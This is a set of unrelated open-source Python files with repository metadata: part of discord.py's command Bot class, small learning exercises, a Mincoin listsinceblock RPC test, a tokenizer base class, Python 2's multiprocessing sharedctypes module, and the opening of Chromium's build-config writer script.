:meth:`Client.send_message`
"""
destination = _get_variable('_internal_author')
extensions = ('delete_after',)
params = {
k: kwargs.pop(k, None) for k in extensions
}
coro = self.send_message(destination, *args, **kwargs)
return self._augmented_msg(coro, **params)
def reply(self, content, *args, **kwargs):
"""|coro|
A helper function that is equivalent to doing
.. code-block:: python
msg = '{0.mention}, {1}'.format(message.author, content)
self.send_message(message.channel, msg, *args, **kwargs)
The following keyword arguments are "extensions" that augment the
behaviour of the standard wrapped call.
Parameters
------------
delete_after: float
Number of seconds to wait before automatically deleting the
message.
See Also
---------
:meth:`Client.send_message`
"""
author = _get_variable('_internal_author')
destination = _get_variable('_internal_channel')
fmt = '{0.mention}, {1}'.format(author, str(content))
extensions = ('delete_after',)
params = {
k: kwargs.pop(k, None) for k in extensions
}
coro = self.send_message(destination, fmt, *args, **kwargs)
return self._augmented_msg(coro, **params)
def upload(self, *args, **kwargs):
"""|coro|
A helper function that is equivalent to doing
.. code-block:: python
self.send_file(message.channel, *args, **kwargs)
The following keyword arguments are "extensions" that augment the
behaviour of the standard wrapped call.
Parameters
------------
delete_after: float
Number of seconds to wait before automatically deleting the
message.
See Also
---------
:meth:`Client.send_file`
"""
destination = _get_variable('_internal_channel')
extensions = ('delete_after',)
params = {
k: kwargs.pop(k, None) for k in extensions
}
coro = self.send_file(destination, *args, **kwargs)
return self._augmented_msg(coro, **params)
def type(self):
"""|coro|
A helper function that is equivalent to doing
.. code-block:: python
self.send_typing(message.channel)
See Also
---------
The :meth:`Client.send_typing` function.
"""
destination = _get_variable('_internal_channel')
return self.send_typing(destination)
# global check registration
def check(self, func):
"""A decorator that adds a global check to the bot.
A global check is similar to a :func:`check` that is applied
on a per command basis except it is run before any command checks
have been verified and applies to every command the bot has.
.. warning::
This function must be a *regular* function and not a coroutine.
Similar to a command :func:`check`\, this takes a single parameter
of type :class:`Context` and can only raise exceptions derived from
:exc:`CommandError`.
Example
---------
.. code-block:: python
@bot.check
def whitelist(ctx):
return ctx.message.author.id in my_whitelist
"""
self.add_check(func)
return func
def add_check(self, func):
"""Adds a global check to the bot.
This is the non-decorator interface to :meth:`check`.
Parameters
-----------
func
The function that was used as a global check.
"""
self._checks.append(func)
def remove_check(self, func):
"""Removes a global check from the bot.
This function is idempotent and will not raise an exception
if the function is not in the global checks.
Parameters
-----------
func
The function to remove from the global checks.
"""
try:
self._checks.remove(func)
except ValueError:
pass
def can_run(self, ctx):
return all(f(ctx) for f in self._checks)
# listener registration
def add_listener(self, func, name=None):
"""The non decorator alternative to :meth:`listen`.
Parameters
-----------
func : coroutine
The extra event to listen to.
name : Optional[str]
The name of the event to listen to. Defaults to ``func.__name__``.
Example
--------
.. code-block:: python
async def on_ready(): pass
async def my_message(message): pass
bot.add_listener(on_ready)
bot.add_listener(my_message, 'on_message')
"""
name = func.__name__ if name is None else name
if not asyncio.iscoroutinefunction(func):
raise discord.ClientException('Listeners must be coroutines')
if name in self.extra_events:
self.extra_events[name].append(func)
else:
self.extra_events[name] = [func]
def remove_listener(self, func, name=None):
"""Removes a listener from the pool of listeners.
Parameters
-----------
func
The function that was used as a listener to remove.
name
The name of the event we want to remove. Defaults to
``func.__name__``.
"""
name = func.__name__ if name is None else name
if name in self.extra_events:
try:
self.extra_events[name].remove(func)
except ValueError:
pass
def listen(self, name=None):
"""A decorator that registers another function as an external
event listener. Basically this allows you to listen to multiple
events from different places, e.g. :func:`discord.on_ready`.
The functions being listened to must be coroutines.
Example
--------
.. code-block:: python
@bot.listen()
async def on_message(message):
print('one')
# in some other file...
@bot.listen('on_message')
async def my_message(message):
print('two')
Would print one and two in an unspecified order.
Raises
-------
discord.ClientException
The function being listened to is not a coroutine.
"""
def decorator(func):
self.add_listener(func, name)
return func
return decorator
# cogs
def add_cog(self, cog):
"""Adds a "cog" to the bot.
A cog is a class that has its own event listeners and commands.
They are meant as a way to organize multiple relevant commands
into a singular class that shares some state or no state at all.
The cog can also have a ``__check`` member function that allows
you to define a global check. See :meth:`check` for more info.
More information will be documented soon.
Parameters
-----------
cog
The cog to register to the bot.
"""
self.cogs[type(cog).__name__] = cog
try:
check = getattr(cog, '_{.__class__.__name__}__check'.format(cog))
except AttributeError:
pass
else:
self.add_check(check)
members = inspect.getmembers(cog)
for name, member in members:
# register commands the cog has
if isinstance(member, Command):
if member.parent is None:
self.add_command(member)
continue
# register event listeners the cog has
if name.startswith('on_'):
self.add_listener(member)
def get_cog(self, name):
"""Gets the cog instance requested.
If the cog is not found, ``None`` is returned instead.
Parameters
-----------
name : str
The name of the cog you are requesting.
"""
return self.cogs.get(name)
def remove_cog(self, name):
"""Removes a cog from the bot.
All registered commands and event listeners that the
cog has registered will be removed as well.
If no cog is found then ``None`` is returned, otherwise
the cog instance that is being removed is returned.
If the cog defines a special member function named ``__unload``
then it is called when removal has completed. This function
**cannot** be a coroutine. It must be a regular function.
Parameters
-----------
name : str
The name of the cog to remove.
"""
cog = self.cogs.pop(name, None)
if cog is None:
return cog
members = inspect.getmembers(cog)
for name, member in members:
# remove commands the cog has
if isinstance(member, Command):
if member.parent is None:
self.remove_command(member.name)
continue
# remove event listeners the cog has
if name.startswith('on_'):
self.remove_listener(member)
try:
check = getattr(cog, '_{0.__class__.__name__}__check'.format(cog))
except AttributeError:
pass
else:
self.remove_check(check)
unloader_name = '_{0.__class__.__name__}__unload'.format(cog)
try:
unloader = getattr(cog, unloader_name)
except AttributeError:
pass
else:
unloader()
del cog
# extensions
def load_extension(self, name):
if name in self.extensions:
return
lib = importlib.import_module(name)
if not hasattr(lib, 'setup'):
del lib
del sys.modules[name]
raise discord.ClientException('extension does not have a setup function')
lib.setup(self)
self.extensions[name] = lib
def unload_extension(self, name):
lib = self.extensions.get(name)
if lib is None:
return
# find all references to the module
# remove the cogs registered from the module
for cogname, cog in self.cogs.copy().items():
if inspect.getmodule(cog) is lib:
self.remove_cog(cogname)
# first remove all the commands from the module
for command in self.commands.copy().values():
if command.module is lib:
command.module = None
if isinstance(command, GroupMixin):
command.recursively_remove_all_commands()
self.remove_command(command.name)
# then remove all the listeners from the module
for event_list in self.extra_events.copy().values():
remove = []
for index, event in enumerate(event_list):
if inspect.getmodule(event) is lib:
remove.append(index)
for index in reversed(remove):
del event_list[index]
try:
func = getattr(lib, 'teardown')
except AttributeError:
pass
else:
try:
func(self)
except:
pass
finally:
# finally remove the import..
del lib
del self.extensions[name]
del sys.modules[name]
# command processing
@asyncio.coroutine
def process_commands(self, message):
"""|coro|
This function processes the commands that have been registered
to the bot and other groups. Without this coroutine, none of the
commands will be triggered.
By default, this coroutine is called inside the :func:`on_message`
event. If you choose to override the :func:`on_message` event, then
you should invoke this coroutine as well.
Warning
--------
This function is necessary for :meth:`say`, :meth:`whisper`,
:meth:`type`, :meth:`reply`, and :meth:`upload` to work due to the
way they are written. It is also required for the :func:`on_command`
and :func:`on_command_completion` events.
Parameters
-----------
message : discord.Message
The message to process commands for.
"""
_internal_channel = message.channel
_internal_author = message.author
view = StringView(message.content)
if self._skip_check(message.author, self.user):
return
prefix = yield from self._get_prefix(message)
invoked_prefix = prefix
if not isinstance(prefix, (tuple, list)):
if not view.skip_string(prefix):
return
else:
invoked_prefix = discord.utils.find(view.skip_string, prefix)
if invoked_prefix is None:
return
invoker = view.get_word()
tmp = {
'bot': self,
'invoked_with': invoker,
'message': message,
'view': view,
'prefix': invoked_prefix
}
ctx = Context(**tmp)
del tmp
if invoker in self.commands:
command = self.commands[invoker]
self.dispatch('command', command, ctx)
try:
yield from command.invoke(ctx)
except CommandError as e:
ctx.command.dispatch_error(e, ctx)
else:
self.dispatch('command_completion', command, ctx)
elif invoker:
exc = CommandNotFound('Command "{}" is not found'.format(invoker))
self.dispatch('command_error', exc, ctx)
@asyncio.coroutine
def on_message(self, message):
yield from self.process_commands(message)
| {
"content_hash": "eac1d493742ea6e9b00f942fe8c751b5",
"timestamp": "",
"source": "github",
"line_count": 855,
"max_line_length": 123,
"avg_line_length": 32.02807017543859,
"alnum_prop": 0.5878250073035349,
"repo_name": "OthmanEmpire/project_othbot",
"id": "03bbd1cb791d85cb052002127f6baedbffb36e52",
"size": "27409",
"binary": false,
"copies": "17",
"ref": "refs/heads/master",
"path": "discord/ext/commands/bot.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "474615"
}
],
"symlink_target": ""
} |
fname = input('Enter the file name: ')
try:
fhand = open(fname)
except:
print('File cannot be opened:', fname)
exit()
count = 0
for line in fhand:
if line.startswith('Subject:') :
count = count + 1
print('There were', count, 'subject lines in', fname)
| {
"content_hash": "a56498656f41f0ded7a698b1d62f6d64",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 53,
"avg_line_length": 25.181818181818183,
"alnum_prop": 0.6245487364620939,
"repo_name": "mkhuthir/learnPython",
"id": "1feac51ee31fe299ef9b4ea584418d3ab3ad384e",
"size": "277",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Book_pythonlearn_com/02_strings/search7.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7706"
}
],
"symlink_target": ""
} |
import numpy
from pandas import DataFrame, Series
def a_dot():
'''
Imagine a point system in which each country is awarded 4 points for each
gold medal, 2 points for each silver medal, and one point for each
bronze medal.
Without using the numpy.dot function (a row-wise pandas apply is used
instead), create a new dataframe called 'olympic_points_df' that includes:
a) a column called 'country_name' with the country name
b) a column called 'points' with the total number of points the country
earned at the Sochi olympics.
You do not need to call the function in your code when running it in the
browser - the grader will do that automatically when you submit or test it.
'''
countries = ['Russian Fed.', 'Norway', 'Canada', 'United States',
'Netherlands', 'Germany', 'Switzerland', 'Belarus',
'Austria', 'France', 'Poland', 'China', 'Korea',
'Sweden', 'Czech Republic', 'Slovenia', 'Japan',
'Finland', 'Great Britain', 'Ukraine', 'Slovakia',
'Italy', 'Latvia', 'Australia', 'Croatia', 'Kazakhstan']
gold = [13, 11, 10, 9, 8, 8, 6, 5, 4, 4, 4, 3, 3, 2, 2, 2, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0]
silver = [11, 5, 10, 7, 7, 6, 3, 0, 8, 4, 1, 4, 3, 7, 4, 2, 4, 3, 1, 0, 0, 2, 2, 2, 1, 0]
bronze = [9, 10, 5, 12, 9, 5, 2, 1, 5, 7, 1, 2, 2, 6, 2, 4, 3, 1, 2, 1, 0, 6, 2, 1, 0, 1]
# YOUR CODE HERE
olympic_medal_counts = {'country_name': countries,
'gold': Series(gold),
'silver': Series(silver),
'bronze': Series(bronze)}
df = DataFrame(olympic_medal_counts)
olympic_points_df = df[['country_name','gold','silver','bronze']].apply(lambda x: [x['country_name'],x['gold']*4,x['silver']*2,x['bronze']*1], axis=1 )
olympic_points_df['points'] = olympic_points_df['gold'] + olympic_points_df['silver'] + olympic_points_df['bronze']
return olympic_points_df[['country_name','points']]
def numpy_dot():
'''
Imagine a point system in which each country is awarded 4 points for each
gold medal, 2 points for each silver medal, and one point for each
bronze medal.
Using the numpy.dot function, create a new dataframe called
'olympic_points_df' that includes:
a) a column called 'country_name' with the country name
b) a column called 'points' with the total number of points the country
earned at the Sochi olympics.
You do not need to call the function in your code when running it in the
browser - the grader will do that automatically when you submit or test it.
'''
countries = ['Russian Fed.', 'Norway', 'Canada', 'United States',
'Netherlands', 'Germany', 'Switzerland', 'Belarus',
'Austria', 'France', 'Poland', 'China', 'Korea',
'Sweden', 'Czech Republic', 'Slovenia', 'Japan',
'Finland', 'Great Britain', 'Ukraine', 'Slovakia',
'Italy', 'Latvia', 'Australia', 'Croatia', 'Kazakhstan']
gold = [13, 11, 10, 9, 8, 8, 6, 5, 4, 4, 4, 3, 3, 2, 2, 2, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0]
silver = [11, 5, 10, 7, 7, 6, 3, 0, 8, 4, 1, 4, 3, 7, 4, 2, 4, 3, 1, 0, 0, 2, 2, 2, 1, 0]
bronze = [9, 10, 5, 12, 9, 5, 2, 1, 5, 7, 1, 2, 2, 6, 2, 4, 3, 1, 2, 1, 0, 6, 2, 1, 0, 1]
# YOUR CODE HERE
olympic_medal_counts = {'country_name': countries,
'gold': Series(gold),
'silver': Series(silver),
'bronze': Series(bronze)}
df = DataFrame(olympic_medal_counts)
medal_counts = df[['gold','silver','bronze']]
points = numpy.dot(medal_counts, [4,2,1])
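# numpy.dot multiplies the (26, 3) medal-count matrix by the weight vector
# [4, 2, 1], producing one weighted point total per country.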
olympic_points = {'country_name': countries,
'points': Series(points)}
return DataFrame(olympic_points)
print(numpy_dot() == a_dot()) | {
"content_hash": "7daf8bde25e3ea1a8dcf3c8f4b60fa09",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 155,
"avg_line_length": 44.701149425287355,
"alnum_prop": 0.5626124967858062,
"repo_name": "kinshuk4/MoocX",
"id": "8b3281d9b8cca4c532f418c1a59c82462f06207e",
"size": "3889",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "k2e/dev/libs/python/numpy-and-pandas/olympic_medal_points.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "60646"
},
{
"name": "HTML",
"bytes": "441"
},
{
"name": "Jupyter Notebook",
"bytes": "17094788"
},
{
"name": "Makefile",
"bytes": "399"
},
{
"name": "Mathematica",
"bytes": "43985"
},
{
"name": "PHP",
"bytes": "9480"
},
{
"name": "Python",
"bytes": "511555"
},
{
"name": "Shell",
"bytes": "8678"
},
{
"name": "Swift",
"bytes": "972"
}
],
"symlink_target": ""
} |
from test_framework.test_framework import MincoinTestFramework
from test_framework.util import assert_equal
class ListSinceBlockTest (MincoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 4
def run_test (self):
'''
`listsinceblock` did not behave correctly when handed a block that was
no longer in the main chain:
             ab0
          /       \
        aa1 [tx0]   bb1
         |           |
        aa2         bb2
         |           |
        aa3         bb3
                     |
                    bb4
Consider a client that has only seen block `aa3` above. It asks the node
to `listsinceblock aa3`. But at some point prior the main chain switched
to the bb chain.
Previously: listsinceblock would find height=4 for block aa3 and compare
this to height=5 for the tip of the chain (bb4). It would then return
results restricted to bb3-bb4.
Now: listsinceblock finds the fork at ab0 and returns results in the
range bb1-bb4.
This test only checks that [tx0] is present.
'''
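# In other words, listsinceblock(lastblockhash) on nodes[0] must walk back to
# the fork point instead of only comparing heights, so senttx is not missed.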
assert_equal(self.is_network_split, False)
self.nodes[2].generate(101)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 500)
assert_equal(self.nodes[3].getbalance(), 0)
# Split network into two
self.split_network()
assert_equal(self.is_network_split, True)
# send to nodes[0] from nodes[2]
senttx = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), 1)
# generate on both sides
lastblockhash = self.nodes[1].generate(6)[5]
self.nodes[2].generate(7)
print('lastblockhash=%s' % (lastblockhash))
self.sync_all()
self.join_network()
# listsinceblock(lastblockhash) should now include tx, as seen from nodes[0]
lsbres = self.nodes[0].listsinceblock(lastblockhash)
found = False
for tx in lsbres['transactions']:
if tx['txid'] == senttx:
found = True
break
assert_equal(found, True)
if __name__ == '__main__':
ListSinceBlockTest().main()
| {
"content_hash": "bdfe3b1ab5b8fd02811b0456d5642c16",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 84,
"avg_line_length": 31.506666666666668,
"alnum_prop": 0.5780787134997885,
"repo_name": "mincoin-project/mincoin",
"id": "21c9be5fec9003b0d7cae99de84ec5425cd5ef12",
"size": "2627",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "qa/rpc-tests/listsinceblock.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "650854"
},
{
"name": "C++",
"bytes": "4577982"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2100"
},
{
"name": "M4",
"bytes": "174531"
},
{
"name": "Makefile",
"bytes": "102845"
},
{
"name": "Objective-C",
"bytes": "6702"
},
{
"name": "Objective-C++",
"bytes": "7229"
},
{
"name": "Python",
"bytes": "882269"
},
{
"name": "QMake",
"bytes": "2020"
},
{
"name": "Roff",
"bytes": "3788"
},
{
"name": "Shell",
"bytes": "34265"
}
],
"symlink_target": ""
} |
class Tokenizer(object):
"""The root class for tokenizers.
Args:
return_set (boolean): A flag to indicate whether to return a set of
tokens instead of a bag of tokens (defaults to False).
Attributes:
return_set (boolean): An attribute to store the flag return_set.
"""
def __init__(self, return_set=False):
self.return_set = return_set
def get_return_set(self):
"""Gets the value of the return_set flag.
Returns:
The boolean value of the return_set flag.
"""
return self.return_set
def set_return_set(self, return_set):
"""Sets the value of the return_set flag.
Args:
return_set (boolean): a flag to indicate whether to return a set of tokens instead of a bag of tokens.
"""
self.return_set = return_set
return True
| {
"content_hash": "96c880c48736a0f27202c8dda65bd0ac",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 114,
"avg_line_length": 31.3,
"alnum_prop": 0.5654952076677316,
"repo_name": "kvpradap/conda-pysm-appveyor",
"id": "36b96b780f548a8ff3aa04b02e5efa61961d181f",
"size": "939",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "py_stringmatching/tokenizer/tokenizer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4050"
},
{
"name": "CSS",
"bytes": "6599"
},
{
"name": "HTML",
"bytes": "802454"
},
{
"name": "JavaScript",
"bytes": "23105"
},
{
"name": "Jupyter Notebook",
"bytes": "2323"
},
{
"name": "PowerShell",
"bytes": "6223"
},
{
"name": "Python",
"bytes": "203911"
},
{
"name": "Shell",
"bytes": "578"
}
],
"symlink_target": ""
} |
import sys
import ctypes
import weakref
from multiprocessing import heap, RLock
from multiprocessing.forking import assert_spawning, ForkingPickler
__all__ = ['RawValue', 'RawArray', 'Value', 'Array', 'copy', 'synchronized']
#
#
#
typecode_to_type = {
'c': ctypes.c_char, 'u': ctypes.c_wchar,
'b': ctypes.c_byte, 'B': ctypes.c_ubyte,
'h': ctypes.c_short, 'H': ctypes.c_ushort,
'i': ctypes.c_int, 'I': ctypes.c_uint,
'l': ctypes.c_long, 'L': ctypes.c_ulong,
'f': ctypes.c_float, 'd': ctypes.c_double
}
#
#
#
def _new_value(type_):
size = ctypes.sizeof(type_)
wrapper = heap.BufferWrapper(size)
return rebuild_ctype(type_, wrapper, None)
def RawValue(typecode_or_type, *args):
'''
Returns a ctypes object allocated from shared memory
'''
type_ = typecode_to_type.get(typecode_or_type, typecode_or_type)
obj = _new_value(type_)
ctypes.memset(ctypes.addressof(obj), 0, ctypes.sizeof(obj))
obj.__init__(*args)
return obj
def RawArray(typecode_or_type, size_or_initializer):
'''
Returns a ctypes array allocated from shared memory
'''
type_ = typecode_to_type.get(typecode_or_type, typecode_or_type)
if isinstance(size_or_initializer, (int, long)):
type_ = type_ * size_or_initializer
obj = _new_value(type_)
ctypes.memset(ctypes.addressof(obj), 0, ctypes.sizeof(obj))
return obj
else:
type_ = type_ * len(size_or_initializer)
result = _new_value(type_)
result.__init__(*size_or_initializer)
return result
def Value(typecode_or_type, *args, **kwds):
'''
Return a synchronization wrapper for a Value
'''
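# Illustrative use (not part of this module): counter = Value('i', 0), then
# "with counter.get_lock(): counter.value += 1" from several processes.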
lock = kwds.pop('lock', None)
if kwds:
raise ValueError('unrecognized keyword argument(s): %s' % kwds.keys())
obj = RawValue(typecode_or_type, *args)
if lock is False:
return obj
if lock in (True, None):
lock = RLock()
if not hasattr(lock, 'acquire'):
raise AttributeError("'%r' has no method 'acquire'" % lock)
return synchronized(obj, lock)
def Array(typecode_or_type, size_or_initializer, **kwds):
'''
Return a synchronization wrapper for a RawArray
'''
lock = kwds.pop('lock', None)
if kwds:
raise ValueError('unrecognized keyword argument(s): %s' % kwds.keys())
obj = RawArray(typecode_or_type, size_or_initializer)
if lock is False:
return obj
if lock in (True, None):
lock = RLock()
if not hasattr(lock, 'acquire'):
raise AttributeError("'%r' has no method 'acquire'" % lock)
return synchronized(obj, lock)
def copy(obj):
new_obj = _new_value(type(obj))
ctypes.pointer(new_obj)[0] = obj
return new_obj
def synchronized(obj, lock=None):
assert not isinstance(obj, SynchronizedBase), 'object already synchronized'
if isinstance(obj, ctypes._SimpleCData):
return Synchronized(obj, lock)
elif isinstance(obj, ctypes.Array):
if obj._type_ is ctypes.c_char:
return SynchronizedString(obj, lock)
return SynchronizedArray(obj, lock)
else:
cls = type(obj)
try:
scls = class_cache[cls]
except KeyError:
names = [field[0] for field in cls._fields_]
d = dict((name, make_property(name)) for name in names)
classname = 'Synchronized' + cls.__name__
scls = class_cache[cls] = type(classname, (SynchronizedBase,), d)
return scls(obj, lock)
#
# Functions for pickling/unpickling
#
def reduce_ctype(obj):
assert_spawning(obj)
if isinstance(obj, ctypes.Array):
return rebuild_ctype, (obj._type_, obj._wrapper, obj._length_)
else:
return rebuild_ctype, (type(obj), obj._wrapper, None)
def rebuild_ctype(type_, wrapper, length):
if length is not None:
type_ = type_ * length
ForkingPickler.register(type_, reduce_ctype)
obj = type_.from_address(wrapper.get_address())
obj._wrapper = wrapper
return obj
#
# Function to create properties
#
def make_property(name):
try:
return prop_cache[name]
except KeyError:
d = {}
exec template % ((name,)*7) in d
prop_cache[name] = d[name]
return d[name]
template = '''
def get%s(self):
self.acquire()
try:
return self._obj.%s
finally:
self.release()
def set%s(self, value):
self.acquire()
try:
self._obj.%s = value
finally:
self.release()
%s = property(get%s, set%s)
'''
prop_cache = {}
class_cache = weakref.WeakKeyDictionary()
#
# Synchronized wrappers
#
class SynchronizedBase(object):
def __init__(self, obj, lock=None):
self._obj = obj
self._lock = lock or RLock()
self.acquire = self._lock.acquire
self.release = self._lock.release
def __reduce__(self):
assert_spawning(self)
return synchronized, (self._obj, self._lock)
def get_obj(self):
return self._obj
def get_lock(self):
return self._lock
def __repr__(self):
return '<%s wrapper for %s>' % (type(self).__name__, self._obj)
class Synchronized(SynchronizedBase):
value = make_property('value')
class SynchronizedArray(SynchronizedBase):
def __len__(self):
return len(self._obj)
def __getitem__(self, i):
self.acquire()
try:
return self._obj[i]
finally:
self.release()
def __setitem__(self, i, value):
self.acquire()
try:
self._obj[i] = value
finally:
self.release()
def __getslice__(self, start, stop):
self.acquire()
try:
return self._obj[start:stop]
finally:
self.release()
def __setslice__(self, start, stop, values):
self.acquire()
try:
self._obj[start:stop] = values
finally:
self.release()
class SynchronizedString(SynchronizedArray):
value = make_property('value')
raw = make_property('raw')
| {
"content_hash": "a47cb302382f72aa7ab43cf92da09d6d",
"timestamp": "",
"source": "github",
"line_count": 233,
"max_line_length": 79,
"avg_line_length": 27.042918454935624,
"alnum_prop": 0.5768925567370259,
"repo_name": "kleientertainment/ds_mod_tools",
"id": "b6a8d7fa4256fcf4f6dffce30dbaf30d780e46e9",
"size": "7963",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "pkg/win32/Python27/Lib/multiprocessing/sharedctypes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "51"
},
{
"name": "C",
"bytes": "10931"
},
{
"name": "C++",
"bytes": "437813"
},
{
"name": "Lua",
"bytes": "9787"
},
{
"name": "Python",
"bytes": "8021665"
},
{
"name": "Shell",
"bytes": "41"
}
],
"symlink_target": ""
} |
"""Writes a build_config file.
The build_config file for a target is a json file containing information about
how to build that target based on the target's dependencies. This includes
things like: the javac classpath, the list of android resources dependencies,
etc. It also includes the information needed to create the build_config for
other targets that depend on that one.
Android build scripts should not refer to the build_config directly, and the
build specification should instead pass information in using the special
file-arg syntax (see build_utils.py:ExpandFileArgs). That syntax allows passing
of values in a json dict in a file and looks like this:
--python-arg=@FileArg(build_config_path:javac:classpath)
Note: If paths to input files are passed in this way, it is important that:
1. inputs/deps of the action ensure that the files are available the first
time the action runs.
2. Either (a) or (b)
a. inputs/deps ensure that the action runs whenever one of the files changes
b. the files are added to the action's depfile
"""
import itertools
import optparse
import os
import sys
import xml.dom.minidom
from util import build_utils
from util import md5_check
import write_ordered_libraries
# Types that should never be used as a dependency of another build config.
_ROOT_TYPES = ('android_apk', 'deps_dex', 'java_binary', 'resource_rewriter')
# Types that should not allow code deps to pass through.
_RESOURCE_TYPES = ('android_assets', 'android_resources')
class AndroidManifest(object):
def __init__(self, path):
self.path = path
dom = xml.dom.minidom.parse(path)
manifests = dom.getElementsByTagName('manifest')
assert len(manifests) == 1
self.manifest = manifests[0]
def GetInstrumentation(self):
instrumentation_els = self.manifest.getElementsByTagName('instrumentation')
if len(instrumentation_els) == 0:
return None
if len(instrumentation_els) != 1:
raise Exception(
'More than one <instrumentation> element found in %s' % self.path)
return instrumentation_els[0]
def CheckInstrumentation(self, expected_package):
instr = self.GetInstrumentation()
if not instr:
raise Exception('No <instrumentation> elements found in %s' % self.path)
instrumented_package = instr.getAttributeNS(
'http://schemas.android.com/apk/res/android', 'targetPackage')
if instrumented_package != expected_package:
raise Exception(
'Wrong instrumented package. Expected %s, got %s'
% (expected_package, instrumented_package))
def GetPackageName(self):
return self.manifest.getAttribute('package')
dep_config_cache = {}
def GetDepConfig(path):
if not path in dep_config_cache:
dep_config_cache[path] = build_utils.ReadJson(path)['deps_info']
return dep_config_cache[path]
def DepsOfType(wanted_type, configs):
return [c for c in configs if c['type'] == wanted_type]
def GetAllDepsConfigsInOrder(deps_config_paths):
def GetDeps(path):
return set(GetDepConfig(path)['deps_configs'])
return build_utils.GetSortedTransitiveDependencies(deps_config_paths, GetDeps)
def ResolveGroups(configs):
while True:
groups = DepsOfType('group', configs)
if not groups:
return configs
for config in groups:
index = configs.index(config)
expanded_configs = [GetDepConfig(p) for p in config['deps_configs']]
configs[index:index + 1] = expanded_configs
class Deps(object):
def __init__(self, direct_deps_config_paths):
self.all_deps_config_paths = GetAllDepsConfigsInOrder(
direct_deps_config_paths)
self.direct_deps_configs = ResolveGroups(
[GetDepConfig(p) for p in direct_deps_config_paths])
self.all_deps_configs = [
GetDepConfig(p) for p in self.all_deps_config_paths]
self.direct_deps_config_paths = direct_deps_config_paths
def All(self, wanted_type=None):
if wanted_type is None:
return self.all_deps_configs
return DepsOfType(wanted_type, self.all_deps_configs)
def Direct(self, wanted_type=None):
if wanted_type is None:
return self.direct_deps_configs
return DepsOfType(wanted_type, self.direct_deps_configs)
def AllConfigPaths(self):
return self.all_deps_config_paths
def RemoveNonDirectDep(self, path):
if path in self.direct_deps_config_paths:
raise Exception('Cannot remove direct dep.')
self.all_deps_config_paths.remove(path)
self.all_deps_configs.remove(GetDepConfig(path))
def _MergeAssets(all_assets):
"""Merges all assets from the given deps.
Returns:
A tuple of lists: (compressed, uncompressed)
Each tuple entry is a list of "srcPath:zipPath". srcPath is the path of the
asset to add, and zipPath is the location within the zip (excluding assets/
prefix)
"""
compressed = {}
uncompressed = {}
for asset_dep in all_assets:
entry = asset_dep['assets']
disable_compression = entry.get('disable_compression', False)
dest_map = uncompressed if disable_compression else compressed
other_map = compressed if disable_compression else uncompressed
outputs = entry.get('outputs', [])
for src, dest in itertools.izip_longest(entry['sources'], outputs):
if not dest:
dest = os.path.basename(src)
# Merge so that each path shows up in only one of the lists, and that
# deps of the same target override previous ones.
other_map.pop(dest, 0)
dest_map[dest] = src
def create_list(asset_map):
ret = ['%s:%s' % (src, dest) for dest, src in asset_map.iteritems()]
# Sort to ensure deterministic ordering.
ret.sort()
return ret
return create_list(compressed), create_list(uncompressed)
def _FilterUnwantedDepsPaths(dep_paths, target_type):
# Don't allow root targets to be considered as a dep.
ret = [p for p in dep_paths if GetDepConfig(p)['type'] not in _ROOT_TYPES]
# Don't allow java libraries to cross through assets/resources.
if target_type in _RESOURCE_TYPES:
ret = [p for p in ret if GetDepConfig(p)['type'] in _RESOURCE_TYPES]
return ret
def main(argv):
parser = optparse.OptionParser()
build_utils.AddDepfileOption(parser)
parser.add_option('--build-config', help='Path to build_config output.')
parser.add_option(
'--type',
help='Type of this target (e.g. android_library).')
parser.add_option(
'--possible-deps-configs',
help='List of paths for dependency\'s build_config files. Some '
'dependencies may not write build_config files. Missing build_config '
'files are handled differently based on the type of this target.')
# android_resources options
parser.add_option('--srcjar', help='Path to target\'s resources srcjar.')
parser.add_option('--resources-zip', help='Path to target\'s resources zip.')
parser.add_option('--r-text', help='Path to target\'s R.txt file.')
parser.add_option('--package-name',
help='Java package name for these resources.')
parser.add_option('--android-manifest', help='Path to android manifest.')
parser.add_option('--is-locale-resource', action='store_true',
help='Whether it is locale resource.')
# android_assets options
parser.add_option('--asset-sources', help='List of asset sources.')
parser.add_option('--asset-renaming-sources',
help='List of asset sources with custom destinations.')
parser.add_option('--asset-renaming-destinations',
help='List of asset custom destinations.')
parser.add_option('--disable-asset-compression', action='store_true',
help='Whether to disable asset compression.')
# java library options
parser.add_option('--jar-path', help='Path to target\'s jar output.')
parser.add_option('--supports-android', action='store_true',
help='Whether this library supports running on the Android platform.')
parser.add_option('--requires-android', action='store_true',
help='Whether this library requires running on the Android platform.')
parser.add_option('--bypass-platform-checks', action='store_true',
help='Bypass checks for support/require Android platform.')
# android library options
parser.add_option('--dex-path', help='Path to target\'s dex output.')
# native library options
parser.add_option('--native-libs', help='List of top-level native libs.')
parser.add_option('--readelf-path', help='Path to toolchain\'s readelf.')
# apk options
parser.add_option('--apk-path', help='Path to the target\'s apk output.')
parser.add_option('--incremental-apk-path',
help="Path to the target's incremental apk output.")
parser.add_option('--incremental-install-script-path',
help="Path to the target's generated incremental install "
"script.")
parser.add_option('--tested-apk-config',
help='Path to the build config of the tested apk (for an instrumentation '
'test apk).')
